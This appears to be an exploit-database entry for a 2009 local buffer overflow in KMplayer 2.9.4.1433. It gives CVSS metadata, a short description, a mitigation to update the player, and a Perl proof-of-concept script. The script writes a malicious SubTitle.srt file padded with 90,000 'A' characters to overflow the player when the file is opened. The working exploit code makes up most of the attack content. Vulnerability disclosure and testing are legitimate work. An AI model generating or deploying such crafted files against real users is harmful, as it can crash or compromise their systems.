The KMplayer (.Srt) File Local Bof Poc

vendor:

KMplayer

by:

b3hz4d (Seyed Behzad Shaghasemi)

9,3

CVSS

HIGH

Buffer Overflow

120 (Buffer Copy without Checking Size of Input)

CWE

Product Name: KMplayer

Affected Version From: 2.9.4.1433

Affected Version To: 2.9.4.1433

Patch Exists: YES

Related CWE: N/A

CPE: a:kmplayer:kmplayer

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows

2009

The KMplayer (.Srt) File Local Bof Poc

This exploit creates a malicious .srt file with a large amount of data which when opened in KMplayer version 2.9.4.1433 and below, causes a buffer overflow and allows for arbitrary code execution.

Mitigation:

Update to the latest version of KMplayer.

Source

Exploit-DB raw data:

#!usr/bin/perl
######################## In The Name Of Allah ####################
#
#               The KMplayer (.Srt) File Local Bof Poc
#                      
#
#Author : b3hz4d (Seyed Behzad Shaghasemi)
#Site : Www.Pentesters.Ir
#Tested on KMplayer <= 2.9.4.1433
#Special Thanks : Navid, Hossein, Hooshang, Mahmood, Mohammad  and all members in Pentesters.ir
#Greetings : Shahriyar && Alireza  && Soroush and all iranian hackers
#
######################### Www.Pentesters.Ir ######################



$junk="A"x 90000;
open(fhandle,">SubTitle.srt");
print fhandle "1"."\n"."00:00:25,100 --> 00:00:30,900"."\n"."$junk\n"."-pentesters\n";
print fhandle "2"."\n"."00:00:31,100 --> 00:00:35,900"."\n"."www.pentesters.ir\n"."-Pentesters.Ir\n";
print fhandle "3"."\n"."00:00:36,100 --> 00:00:40,900"."\n"."www.pentesters.ir\n"."-Pentesters.Ir\n";
print fhandle "4"."\n"."00:00:41,100 --> 00:00:45,900"."\n"."www.pentesters.ir\n"."-Pentesters.Ir\n";
print fhandle "5"."\n"."00:00:46,100 --> 00:00:50,900"."\n"."www.pentesters.ir\n"."-Pentesters.Ir\n";
print fhandle "6"."\n"."00:00:51,100 --> 00:00:55,900"."\n"."www.pentesters.ir\n"."-Pentesters.Ir\n";
close(fhandle);

# milw0rm.com [2009-07-20]